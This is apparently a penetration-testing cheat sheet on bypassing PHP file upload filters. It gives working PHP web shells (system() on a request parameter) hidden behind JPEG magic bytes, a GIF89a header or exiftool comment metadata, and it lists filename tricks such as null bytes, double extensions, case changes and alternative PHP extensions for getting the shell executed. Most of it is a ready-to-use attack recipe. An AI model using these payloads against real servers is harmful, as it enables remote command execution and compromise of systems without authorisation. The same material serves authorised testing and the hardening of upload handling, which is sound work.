File Upload

PHP file upload bypass

  • MIME type plus magic bytes. Take a real image, keep only its first few bytes (the header a magic-byte sniffer such as PHP's `finfo`/`mime_content_type()` looks at), append the PHP payload, name the file "pic.jpg.php" and keep `Content-Type: image/jpeg` on the multipart part. This defeats filters that trust the client-supplied Content-Type or only sniff the leading bytes; the resulting file is not a decodable image, so it will not survive a check that actually parses or re-encodes it.


Content-Disposition: form-data; name="imagen"; filename="pic.jpg.php"
Content-Type: image/jpeg

// Base64 decode this line before sending the request
/9j/4AAQSkZJRgABAQEAYABgAAD//gA7Q1JFQVRPUjogZ2QtanBlZyB2MS4wICh1c2luZyBJSkcgSlBFRyB2OTApLCBxdWFsaXR5ID0gOTAK/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU/8AAEQgAyADIAwEiAAIRAQMRAf/EAB8AAAEFAQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKC//EALUQAAIBAwMCBAMFBQQEAAABfQECAwAEEQUSITFBBhNRYQcicRQygZGhCCNCscEVUtHwJDNicoIJ
<?php echo system($_REQUEST['cmd']);?>

// GIF variant: "GIF89a;" is the whole magic, so no base64 is needed
GIF89a;
<?php
system($_GET['cmd']); // web shell; use the full <?php tag, the short <? form only works when short_open_tag is enabled
?>
  • Exiftool: write the payload into the image's comment (COM) metadata. The file stays a valid image, so it passes magic-byte and `getimagesize()` checks; getting it executed then relies on the double-extension handling below.

# $_GET["cmd"] uses double quotes so the shell's single-quoted argument stays intact
exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' file.jpg
mv file.jpg file.php.jpg
  • Special characters and null bytes in the filename: `shell.php%00.jpg` / `shell.php\x00.jpg` (null-byte truncation only works on PHP older than 5.3.4), trailing dot or space (`shell.php.`, `shell.php `, stripped on Windows file systems), and case variations (`shell.pHp`) where the extension check is case-sensitive but the handler is not. Use Burp Intruder to brute-force extension, separator and encoding combinations.

  • Double extensions: `shell.php.jpg` is executed by Apache when PHP is mapped with `AddHandler`, which matches any extension in the name rather than only the last one; `shell.jpg.php` defeats filters that only check whether an image extension appears somewhere in the name. Also try alternative extensions the handler may map to PHP (`.phtml`, `.php5`, `.phar`).
